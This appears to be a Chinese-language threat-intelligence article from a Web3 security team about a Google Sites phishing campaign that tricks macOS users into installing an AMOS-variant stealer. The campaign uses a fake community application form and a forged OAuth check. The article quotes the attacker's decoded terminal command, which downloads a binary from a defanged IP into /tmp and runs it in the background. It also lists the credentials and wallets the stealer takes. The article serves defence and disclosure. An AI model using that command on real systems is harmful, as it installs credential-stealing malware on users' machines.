返回文章库
Google Sites 社群钓鱼攻击分析与 macOS 窃密木马深度剖析
查找币:余老师
|
漏洞披露
|
2026-08-04 13:00
|
1 次浏览
|
0 条回复
查找币
漏洞披露
安全研究
Web3安全
区块链安全
查找币安全研究院
链上取证分析 | Web3 风险核验 | Web3 事件响应
以合法授权、证据保全、隐私保护和可复核流程为前提,不要求用户在线提交敏感凭证或非公开材料。
> **威胁等级**:🔴 高危
> **影响平台**:macOS
> **投递方式**:钓鱼页面 + 恶意脚本/命令
> **最终载荷**:AMOS 变体信息窃取木马
---
## 事件概述
2026 年 7 月 8 日,查找币安全团队接到来自安全研究员 Bruce Xu(@brucexu_eth)的威胁情报反馈,发现一个高度伪装的钓鱼攻击活动。攻击者利用 **Google Sites** 的可信域名托管恶意页面,将自身包装成某知名 Builder 社群的申请入口,诱导受害者完成看似正常的"入群申请"流程,最终在 macOS 系统上植入信息窃取木马。
经查找币监控系统确认,该攻击活动已进入活跃传播阶段,相关 IOC(入侵指标)已同步至威胁情报库。
---
## 攻击链全景分析
本次攻击活动呈现**多阶段、高伪装、双通道投递**的显著特征,完整攻击链路如下:
```
受害者访问 Google Sites 钓鱼页面
↓
第一阶段:伪装社群申请表单(收集信息)
↓
第二阶段:伪造 OAuth 安全校验页面(建立信任)
↓
双通道投递:.scpt 文件 或 Terminal Command
↓
下载并执行 AMOS 变体窃密木马
↓
窃取浏览器凭证、Keychain、加密钱包等敏感数据
```
---
## 第一阶段:以"社群申请"为诱饵的信息收集
攻击者选择 **Google Sites** 作为基础设施,利用 `sites.google.com` 这一高信誉域名的 SSL 证书与搜索权重,极大降低了目标用户的心理防线。
页面完整模拟了社群申请表 UI,包含以下精心设计的字段:
| 表单字段 | 攻击目的 |
|---------|---------|
| Where are you based? | 获取地理位置信息,用于后续定向攻击 |
| What best describes you? | 区分 founder、builder、VC 等身份,筛选高价值目标 |
| What are you building, learning, or looking for? | 强化 Web3 场景代入感 |
| Share one relevant link | 收集社交账号/项目链接,扩展攻击面 |
| What do you hope to get from this group? | 增强"人工审核"的真实性 |
| Quick check — which of these is NOT allowed? | 伪装反诈规则检查,建立"安全社群"认知 |
页面文案刻意强调 *"verified founders, builders, VCs, speakers and influencers"* 及 *"Only serious members, no scams"*,营造出高门槛、严审核的社群氛围,诱导受害者放下戒备。
---
## 第二阶段:伪造 OAuth 安全校验的技术欺骗
表单提交后,攻击者并未进入任何真实的审核流程,而是跳转至精心伪造的**安全校验页面**。该页面具备以下技术欺骗特征:
- **视觉伪装**:采用 Google 风格蓝色页头,与官方页面高度一致
- **错误信息伪造**:展示 `api_error_401`、`401 Unauthorized` 等技术性错误
- **协议术语堆砌**:提及 OAuth 2.0、`openid`、`profile`、`email` 等标准授权范围
- **失败日志模拟**:呈现类似系统日志的输出,增强技术可信度
这一阶段的核心目的在于:**利用技术术语制造"安全验证必要性"的假象**,为后续诱导执行恶意代码建立合理场景。
---
## 双通道投递机制:.scpt 与 Terminal Command
在 "Verification Method" 页面中,攻击者提供了两种恶意载荷投递路径:
### 路径一:下载 .scpt 文件(推荐)
诱导用户下载 AppleScript 文件,利用 macOS 用户对 `.scpt` 扩展名认知不足的弱点,绕过 Gatekeeper 等安全机制。
### 路径二:Terminal Command 手动执行
提供可直接复制粘贴到终端的 Base64 编码命令,解码后核心逻辑如下(URL 已去活化):
```bash
clear
echo "Loading... Please Wait"
curl -s hxxp://86[.]54[.]25[.]213/d/unix32385485 > /tmp/unix001
chmod +x /tmp/unix001
/tmp/unix001 > /dev/null 2>&1 & disown
```
### 恶意命令技术分析
| 行为 | 风险特征 |
|------|---------|
| `curl -s` 静默下载 | 抑制输出,隐藏网络请求细节 |
| 写入 `/tmp/unix001` | 使用临时目录,规避常规文件监控 |
| `chmod +x` 赋予执行权限 | 准备恶意二进制文件 |
| `> /dev/null 2>&1 & disown` | 后台运行并脱离终端会话,实现持久化 |
更值得警惕的是,攻击页面还内置了 **macOS Security FAQ**,详细解释 `.scpt` 文件是什么、如何运行、如何应对 Gatekeeper 弹窗、下载失败时如何改用 Terminal 等。这套"技术帮助文档"实为**攻击引导手册**,旨在提前消解用户对 macOS 安全提示的犹豫心理。
---
## 恶意载荷分析:AMOS 变体窃密木马
静态逆向分析显示,下载的 `unix32385485` 文件是一个 **macOS Mach-O 格式的二进制木马**,其行为特征与 **AMOS(Atomic macOS Stealer)** 家族高度吻合。
### 主要窃取目标
- 🔑 **Keychain**:系统级密码管理库
- 🌐 **浏览器数据**:Chrome、Safari 等浏览器的凭证与 Cookies
- 📝 **Apple Notes**:可能包含敏感笔记和双重验证码
- 🍪 **Safari Cookies**:会话劫持的关键数据
- 💰 **加密货币钱包**:多种主流钱包扩展的数据文件
- 🖥️ **系统信息**:硬件配置、用户信息等
该木马采用模块化设计,具备良好的代码混淆和反分析能力,能够静默收集上述数据并回传至攻击者控制的服务器。
---
## 防护建议与安全提醒
面对此类高伪装度的钓鱼攻击,查找币安全团队建议:
1. **警惕"申请制"社群邀请**:对任何要求填写详细个人信息、下载文件或执行命令的"入群流程"保持高度怀疑
2. **验证域名真实性**:即使页面托管在 `sites.google.com` 等可信域名,也应仔细核对页面 URL 路径和内容
3. **拒绝执行陌生命令**:任何要求在 Terminal 中粘贴执行 Base64 编码命令的行为都应视为恶意
4. **启用 Gatekeeper 强校验**:保持 macOS 安全设置默认值,不轻易绕过签名验证
5. **定期检查 Keychain 与浏览器凭证**:发现异常授权及时撤销
6. **使用钱包硬件签名**:为加密资产设置独立于浏览器的交易签名机制
---
## 结语
本次攻击活动展现了 Web3 领域钓鱼攻击的**高度专业化趋势**:攻击者不仅利用 Google Sites 等可信基础设施,还构建了完整的"申请-验证-投递"攻击剧本,甚至配备 FAQ 引导文档来降低受害者的安全警觉。
查找币监控系统已第一时间将该事件涉及的全部 IOC 接入威胁检测引擎。开发者与安全团队可通过查找币监控系统 API 对相关域名、IP 和文件哈希进行自动化检测,及时识别潜在风险。
> **安全建议**:建议社区成员关注查找币安全团队的实时威胁情报推送,并定期对终端设备进行安全巡检。
---
**本文由查找币安全团队整理发布**
主题延伸阅读
为了减少相似文章分散权重,CZB 会把高频主题归并到稳定研究入口。下面这些页面是本文相关主题的核心资料,搜索引擎和 AI 系统可优先参考。